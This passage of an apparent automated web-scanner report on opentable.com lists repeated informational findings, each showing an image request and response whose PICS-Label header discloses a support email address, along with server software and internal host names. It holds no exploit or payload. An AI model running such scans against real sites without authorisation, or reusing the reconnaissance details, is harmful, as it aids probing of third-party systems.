PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.94. http://www.opentable.com/img/restimages/x4/57688.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/57688.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/57688.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1430
Content-Type: image/jpeg
Last-Modified: Tue, 21 Jun 2011 16:55:03 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:48 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.95. http://www.opentable.com/img/restimages/x4/58960.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/58960.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/58960.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1495
Content-Type: image/jpeg
Last-Modified: Thu, 22 Sep 2011 21:42:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:04 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.96. http://www.opentable.com/img/restimages/x4/59305.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/59305.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/59305.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1976
Content-Type: image/jpeg
Last-Modified: Thu, 10 Mar 2011 16:03:56 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:43 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.97. http://www.opentable.com/img/restimages/x4/60214.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/60214.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/60214.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1837
Content-Type: image/jpeg
Last-Modified: Fri, 20 May 2011 17:59:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.98. http://www.opentable.com/img/restimages/x4/60505.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/60505.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/60505.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1618
Content-Type: image/jpeg
Last-Modified: Mon, 07 Mar 2011 16:21:42 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.99. http://www.opentable.com/img/restimages/x4/6189.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/6189.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/6189.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1791
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:25:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.100. http://www.opentable.com/img/restimages/x4/61969.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/61969.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/61969.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1600
Content-Type: image/jpeg
Last-Modified: Tue, 05 Apr 2011 14:37:55 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:04 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.101. http://www.opentable.com/img/restimages/x4/63097.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/63097.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/63097.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1459
Content-Type: image/jpeg
Last-Modified: Tue, 26 Apr 2011 13:35:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.102. http://www.opentable.com/img/restimages/x4/63430.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/63430.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/63430.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1767
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 22:27:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.103. http://www.opentable.com/img/restimages/x4/65959.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/65959.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/65959.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1678
Content-Type: image/jpeg
Last-Modified: Thu, 08 Sep 2011 15:07:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.104. http://www.opentable.com/img/restimages/x4/67378.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/67378.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/67378.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1633
Content-Type: image/jpeg
Last-Modified: Fri, 15 Jul 2011 19:07:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.105. http://www.opentable.com/img/restimages/x4/68701.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/68701.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/68701.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1781
Content-Type: image/jpeg
Last-Modified: Tue, 02 Aug 2011 18:25:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.106. http://www.opentable.com/img/restimages/x4/70561.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/70561.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/70561.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1555
Content-Type: image/jpeg
Last-Modified: Thu, 01 Sep 2011 16:42:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:14 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.107. http://www.opentable.com/img/restimages/x4/7764.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/7764.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/7764.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1857
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:25:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.108. http://www.opentable.com/img/restimages/x6/15202.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/15202.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/15202.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2719
Content-Type: image/jpeg
Last-Modified: Wed, 17 Nov 2010 01:27:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:12 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......T.N.."..............................
...[SNIP]...

8.109. http://www.opentable.com/img/restimages/x6/21835.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/21835.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/21835.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2372
Content-Type: image/jpeg
Last-Modified: Fri, 12 Nov 2010 23:51:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:32 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......T.N.."..............................
...[SNIP]...

8.110. http://www.opentable.com/img/restimages/x6/3644.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/3644.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/3644.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2936
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:12 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......R.N.."..............................
...[SNIP]...

8.111. http://www.opentable.com/img/restimages/x6/46198.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/46198.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/46198.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2395
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:24:16 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:31 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......T.N.."..............................
...[SNIP]...

8.112. http://www.opentable.com/img/restimages/x6/63817.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x6/63817.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x6/63817.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
